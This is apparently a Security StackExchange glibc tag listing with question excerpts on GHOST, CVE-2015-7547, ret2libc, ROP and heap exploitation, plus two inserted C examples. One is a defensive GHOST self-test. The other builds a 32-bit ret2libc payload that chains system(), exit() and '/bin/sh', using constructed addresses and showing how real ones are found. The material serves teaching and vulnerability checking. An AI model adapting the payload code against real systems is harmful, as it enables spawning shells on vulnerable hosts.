Questions tagged [glibc]

The GNU C Library (glibc) is the GNU Project's implementation of the C standard library.

28 questions
61 votes, 4 answers

GHOST bug: is there a simple way to test if my system is secure?

GHOST (CVE-2015-0235) just popped up. How can I quickly check if a system of mine is secure? Ideally with a one line shell command. According to the ZDNet article "you should then reboot the system". Ideally the test would also indicate this...
asked by the
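An added self-test for the GHOST question above. It is not from the question or its answers; it is a C program modelled on the check published in the Qualys advisory for CVE-2015-0235. It calls gethostbyname_r() with an all-digit name sized so that an unpatched glibc writes one pointer past the end of the caller-supplied buffer into a canary placed right behind it, while a patched glibc rejects the too-small buffer with ERANGE. It needs no network and no privileges (build with `cc -o ghost ghost.c`, run `./ghost`). It only tells you whether the glibc on disk that this process mapped is fixed; services that were already running when you updated still have the old library mapped until they are restarted, which is the reason behind the "reboot" advice.

```c
/* Added example (not from the original question): GHOST self-test,
 * modelled on the test in the Qualys advisory for CVE-2015-0235. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CANARY "in_the_coal_mine"

/* File-scope so the layout is fixed: the canary sits directly after the
 * buffer that gethostbyname_r() is allowed to write into. */
static struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

/* Returns 1 if the canary was overwritten (vulnerable glibc),
 *         0 if glibc reported ERANGE (patched),
 *        -1 for any other outcome (e.g. a non-glibc libc). */
int ghost_check(void)
{
    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    char name[sizeof(temp.buffer)];

    /* The buggy size check in __nss_hostname_digits_dots() forgot
     * sizeof(char *).  Pick strlen(name) so that its computed
     * size_needed equals buflen exactly: the check passes, but the real
     * need is buflen + sizeof(char *), so the write runs past the buffer. */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    memset(name, '0', len);     /* all digits: takes the digits-and-dots path */
    name[len] = '\0';

    int retval = gethostbyname_r(name, &resbuf, temp.buffer,
                                 sizeof(temp.buffer), &result, &herrno);

    if (strcmp(temp.canary, CANARY) != 0)
        return 1;               /* overflow reached the canary */
    if (retval == ERANGE)
        return 0;               /* patched: buffer correctly rejected */
    return -1;
}

int main(void)
{
    switch (ghost_check()) {
    case 1:  puts("vulnerable");        return EXIT_FAILURE;
    case 0:  puts("not vulnerable");    return EXIT_SUCCESS;
    default: puts("should not happen"); return EXIT_FAILURE;
    }
}
```

The check is a local one: run it inside each container or chroot you care about, since each may carry its own glibc.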
10 votes, 1 answer

Is Java vulnerable to glibc GHOST Vulnerability in Linux?

I see on our RedHat Linux platform that "java" process has dependency over glibc library: [root@hpproliant1 ~]# ldd /usr/bin/java linux-gate.so.1 => (0xffffe000) libpthread.so.0 => /lib/libpthread.so.0 (0xf7f77000) libjli.so =>…
asked by Mert Z.
10 votes, 1 answer

GHOST: which services are vulnerable, ssh, web server?

GHOST (CVE-2015-0235) just popped up. GHOST bug: is there a simple way to test if my system is secure? deals with how to find out if your system is vulnerable. exim is mentioned specifically. Apparently OpenSSH is vulnerable but attacks can easily…
asked by the
10 votes, 2 answers

Why must a ret2libc attack follow the order "system(), exit(), command"?

In a ret2libc attack, I understand that the return address can be overwritten with the address of the system command, which takes a command string as an argument. In this case, shouldn't the address of the command string come directly after the…
9 votes, 1 answer

Jump Oriented Programming segmentation fault issue

I found this interesting post on jop, and since I was not familiar with the concept I decided to play with it. I managed to call arbitrary functions defined in my binary with or without arguments, but never managed to run the example given on the…
asked by dearn44
9 votes, 1 answer

In light of the glibc DNS vulnerability, why aren't Linux distros updating install images?

Doesn't that make the mere act of updating a newly installed Linux instance unsafe, since the initially installed package manager is vulnerable? Am I missing something? For example, the current Ubuntu 15.10 image dates 21 Oct…
asked by lamefun
7 votes, 2 answers

Is ASLR useless in preventing attacks such as return-to-libc in linux?

If I'm correct, due to ASLR we load libc into some random address. And then in order to make that happen without allowing write permissions of text pages within memory we use plt/got. Now I can simply jump back into some libc@plt function that is…
asked by DrPrItay
6 votes, 1 answer

How to restrict dlopen() from or to certain paths?

If I want to disable execution of programs on a filesystem, I can use the noexec mount option. However, this doesn't work with dynamic libraries loaded through dlopen(). So what is the way to do it with nacl or seccomp? (this is for untrusted…
asked by user2284570
5 votes, 1 answer

How to bypass ASLR with ROP

I was reading this article by the InfoSec institute: http://resources.infosecinstitute.com/an-introduction-to-returned-oriented-programming-linux/#gref And was able to follow along until he did the ROP Chain. He finds the offset of printf and execve…
asked by alloy
5 votes, 1 answer

strategy for dealing with glibc issues through all docker containers

CVE-2015-7547 affects glibc, which is present in pretty nearly all docker containers. There's an automated process underway which will update all official containers, but it's not immediately clear how I should manage the situation. Some third…
asked by mc0e
4 votes, 1 answer

Return-to-libc Attack mystery

I'm studying the Return-to-libc Attack and I understand the concept. But one thing still does not make sense. In order to make the attack I need the memory address of system() and "/bin/sh", which is different on every system. And all the examples I…
asked by Spring
4 votes, 2 answers

return to libc - finding libc's address and finding offsets

So I tried performing a return-to-libc according to https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/ . I found libc's address by using "ldd vuln", and found system's offset by using "readelf -s…
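A worked layout for the ret2libc questions above: the one asking why the order is system(), exit(), command, and the ones about turning a libc base plus readelf offsets into usable addresses. This is an added example, not code from any of the questions. It builds the classic 32-bit x86 payload and models what the CPU does at `ret`, which is where the ordering comes from: `ret` pops the word in the saved-EIP slot into EIP and leaves ESP pointing at the next word. system() is then running as if it had been entered by a `call`, so under the cdecl convention it treats [ESP] as its own return address and [ESP+4] as its first argument. The word after system()'s address therefore has to be where you want system() to return to (exit(), so the process ends cleanly instead of crashing), and the word after that the pointer to "/bin/sh". The libc base and the three offsets are constructed values; on a real non-ASLR target the base comes from `ldd ./vuln` and the offsets from `readelf -s` on libc (system, exit) and a string search for "/bin/sh", as the question describes.

```c
/* Added example (not from the original questions): 32-bit x86 ret2libc
 * payload layout, with constructed addresses.  The point is the order
 * of the three words after the padding and what system() sees. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LIBC_BASE   0xf7e00000u   /* constructed: libc load address (ASLR off) */
#define SYSTEM_OFF  0x0003ada0u   /* constructed: offset of system() per readelf -s */
#define EXIT_OFF    0x0002e9d0u   /* constructed: offset of exit() per readelf -s    */
#define BINSH_OFF   0x0015ba0bu   /* constructed: offset of the "/bin/sh" string     */

/* Absolute address = load base + offset taken from the libc file. */
uint32_t libc_addr(uint32_t base, uint32_t off) { return base + off; }

/* x86 is little-endian: store/load 32-bit words byte by byte. */
static void put32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Payload:  [pad_len filler][system][exit]["/bin/sh" ptr]
 * pad_len is the distance from the overflowed buffer to the saved EIP.
 * Returns the payload length, or 0 if `out` is too small. */
size_t build_ret2libc(uint8_t *out, size_t out_len, size_t pad_len,
                      uint32_t system_addr, uint32_t exit_addr, uint32_t binsh_addr)
{
    size_t total = pad_len + 3 * sizeof(uint32_t);
    if (total > out_len)
        return 0;
    memset(out, 'A', pad_len);             /* filler up to the saved EIP      */
    put32(out + pad_len,     system_addr); /* saved EIP slot -> system()      */
    put32(out + pad_len + 4, exit_addr);   /* system()'s return address       */
    put32(out + pad_len + 8, binsh_addr);  /* system()'s first cdecl argument */
    return total;
}

/* What the callee observes after the overflowed function executes `ret`:
 * EIP gets the popped word, ESP now points just past it, so the callee
 * sees its return address at [ESP] and its first argument at [ESP+4]. */
struct callee_view { uint32_t eip, ret_slot, arg0; };

struct callee_view simulate_ret(const uint8_t *stack, size_t saved_eip_off)
{
    struct callee_view v;
    v.eip      = get32(stack + saved_eip_off);      /* popped by ret         */
    v.ret_slot = get32(stack + saved_eip_off + 4);  /* [ESP] inside system() */
    v.arg0     = get32(stack + saved_eip_off + 8);  /* [ESP+4]: the argument */
    return v;
}

/* End-to-end check with the constructed values: 1 if the chain lines up. */
int self_check(void)
{
    uint8_t payload[128];
    size_t n = build_ret2libc(payload, sizeof payload, 64,
                              libc_addr(LIBC_BASE, SYSTEM_OFF),
                              libc_addr(LIBC_BASE, EXIT_OFF),
                              libc_addr(LIBC_BASE, BINSH_OFF));
    struct callee_view v = simulate_ret(payload, 64);
    return n == 76 && v.eip == 0xf7e3ada0u &&
           v.ret_slot == 0xf7e2e9d0u && v.arg0 == 0xf7f5ba0bu;
}

int main(void)
{
    uint8_t payload[128];
    size_t n = build_ret2libc(payload, sizeof payload, 64,
                              libc_addr(LIBC_BASE, SYSTEM_OFF),
                              libc_addr(LIBC_BASE, EXIT_OFF),
                              libc_addr(LIBC_BASE, BINSH_OFF));
    struct callee_view v = simulate_ret(payload, 64);
    printf("payload: %zu bytes\n", n);
    printf("ret pops EIP = %#x (system)\n", v.eip);
    printf("system() sees return address %#x (exit), arg %#x (\"/bin/sh\")\n",
           v.ret_slot, v.arg0);
    return self_check() ? 0 : 1;
}
```

This ordering is specific to 32-bit cdecl, where arguments live on the stack. On x86-64 the first argument travels in RDI, so the same attack needs a `pop rdi; ret` gadget in front of system()'s address, which is where ROP takes over from plain ret2libc.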
3 votes, 2 answers

How to confirm that my router is vulnerable to the glibc vulnerability (CVE-2015-7547)?

I have tried the PoC from Google (https://github.com/fjserna/CVE-2015-7547) to test my host PC (first execute the server side PoC, then execute the client side PoC). It was vulnerable. Now I want to check my router, but I'm not sure how to test it. If I…
3 votes, 1 answer

return-to-libc attack

I was trying to attempt at return-to-libc buffer overflow attack for my Computer Software Security assignment. As far as my understanding goes, we can do these kind of attacks regardless of stack protection measures such as canaries and…
asked by yellowflash
2 votes, 1 answer

CTF setup for debugging heap exploits

I'm currently studying binary heap exploitation (mainly the glibc (ptmalloc2) implementation), for CTF competitions. The problem I'm facing is debugging challenges designed for a certain glibc version. I know there are some differences between (for…